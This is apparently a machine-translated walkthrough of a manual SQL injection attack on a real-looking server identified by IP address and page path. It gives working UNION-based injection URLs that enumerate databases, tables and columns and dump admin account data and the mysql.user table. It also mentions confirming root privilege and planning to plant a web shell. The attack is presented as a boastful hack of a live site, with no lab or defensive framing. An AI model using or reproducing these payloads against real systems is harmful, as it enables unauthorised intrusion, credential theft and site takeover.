Injection point: http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109
Use order by to determine a field
Order BY 25 Error
Order by 23 Normal return
Order BY 24 Try
OK, order by 25 error, ORDER by 24 returns normally, the field is determined at 24.
Next, use the union package to query the database name password, and so on.
Use database () to view the names of the databases
Use version () to view the revision number
Use @ @datadir to view the path to the database
Use User () to view users
Use System_user () to see who the users of the current system are
Look at the current connected user using Current_User () query
Haha, come out, are it ah, MySQL also open remote login, it seems to have been to the day, by default will not use remote login.
See who the user is currently connected to Session_user ()
and Ord (User (), 1, 1) =114 See what permissions users are
OK, the page returned is different from the page where the error occurred, that is, root permission
This is good, as long as you know the absolute path can write a word in
First Use @ @version_compile_os to see what the operating system is
Check the INFORMATION_SCHEMA table to see what databases are available
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_schema%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ schema.columns--
With so many databases, the next one is the name of the table,
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+table_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_schema.tables %20where%20table_schema=database%28%29--
Haha, straight enough, all the table names come out,
Database name, table names burst out, then the next thing to do is to explode the field,
http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28distinct+column_name%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20information_ Schema.columns+where+table_name=0x61646d696e5f6d656e75
Note: 0x61646d696e5f6d656e75 is the hex of the admin_menu that exploded above
Using http://203.246.61.24/ipsi/sub05/sub09_A.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,group_concat% 28admin_id,0x2b,allow_menu%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20admin_menu
Burst this information, flat is not the administrator's account password
But the method is the same,
and 1=2 Union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from Mysql.user
http://203.246.61.24/ipsi/sub05/sub09_a.php?menu=109%20and%201=2%20union%20select%201,2,3,4,5,@ @version_ Compile_os,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20mysql.user
Hand-Injected Stick station